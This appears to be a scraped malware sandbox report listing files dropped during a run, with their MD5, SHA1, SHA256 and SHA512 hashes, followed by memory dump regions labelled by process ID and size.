24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba

MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370

MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b

MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb

MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598

MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9

MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
cf04625a7d603bb9c5faf7f5c3141e03

SHA1
d12db3b322a3060ee5bde5043e8a8d38da43399b

SHA256
f0805a0fef2a991b9d98cd47676e9a2fb0c79b7ff0032664a2af15fbf7038607

SHA512
7f47d7c7fbe884dde76bd7a305a8a7516b69a888e0b281fee953f4b238adc2fdf7dd167136e8022c6c588dbc293150c9772e9490cb8ae77739643539c0521942

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
cd1f75b631b2361583d73965ece89b83

SHA1
f910796ffcbba4216e49d37de85e3796fbd6ef48

SHA256
15e4d23f42a71c915d05c0ecefa3e3b4976ae34fb0beb08ecac3a07e0c550c42

SHA512
7abf5ced00de9bc8cda3b1fa8e34f17e4aeafe607e8e692ae7d98b4805bb14af817ac9557b5e60935e85ba3f9d0faaf3939c6906e9d651e65c8de70a2d793bc4

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/268-63-0x0000000000000000-mapping.dmp

Download
memory/452-60-0x000000002F3F1000-0x000000002F3F4000-memory.dmp

Filesize
12KB

Download
memory/452-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/452-61-0x0000000071581000-0x0000000071583000-memory.dmp

Filesize
8KB

Download
memory/560-142-0x0000000004912000-0x0000000004913000-memory.dmp

Filesize
4KB

Download
memory/560-135-0x0000000000000000-mapping.dmp

Download
memory/560-141-0x0000000004910000-0x0000000004911000-memory.dmp

Filesize
4KB

Download
memory/740-160-0x0000000000000000-mapping.dmp

Download
memory/740-166-0x00000000049E0000-0x00000000049E1000-memory.dmp

Filesize
4KB

Download
memory/740-167-0x00000000049E2000-0x00000000049E3000-memory.dmp

Filesize
4KB

Download
memory/860-147-0x0000000000000000-mapping.dmp

Download
memory/860-154-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/860-155-0x00000000048D2000-0x00000000048D3000-memory.dmp

Filesize
4KB

Download
memory/936-134-0x0000000000000000-mapping.dmp

Download
memory/944-110-0x0000000000000000-mapping.dmp

Download
memory/944-116-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/944-117-0x0000000004932000-0x0000000004933000-memory.dmp

Filesize
4KB

Download
memory/984-146-0x0000000000000000-mapping.dmp

Download
memory/1404-70-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1404-75-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1404-64-0x0000000000000000-mapping.dmp

Download
memory/1404-65-0x00000000753E1000-0x00000000753E3000-memory.dmp

Filesize
8KB

Download
memory/1404-66-0x00000000009C0000-0x00000000009C1000-memory.dmp

Filesize
4KB

Download
memory/1404-67-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/1404-68-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/1404-69-0x0000000002030000-0x0000000002C7A000-memory.dmp

Filesize
12.3MB

Download
memory/1404-88-0x00000000062D0000-0x00000000062D1000-memory.dmp

Filesize
4KB

Download
memory/1404-73-0x0000000005690000-0x0000000005691000-memory.dmp

Filesize
4KB

Download
memory/1404-87-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/1404-80-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/1404-79-0x00000000060A0000-0x00000000060A1000-memory.dmp

Filesize
4KB

Download
memory/1464-159-0x0000000000000000-mapping.dmp

Download
memory/1580-128-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1580-121-0x0000000000000000-mapping.dmp

Download
memory/1580-129-0x0000000004852000-0x0000000004853000-memory.dmp

Filesize
4KB

Download
memory/1636-89-0x0000000000000000-mapping.dmp

Download
memory/1756-90-0x0000000000000000-mapping.dmp

Download
memory/1756-95-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/1756-97-0x0000000004A52000-0x0000000004A53000-memory.dmp

Filesize
4KB

Download
memory/1920-109-0x0000000000000000-mapping.dmp

Download
memory/2032-120-0x0000000000000000-mapping.dmp

Download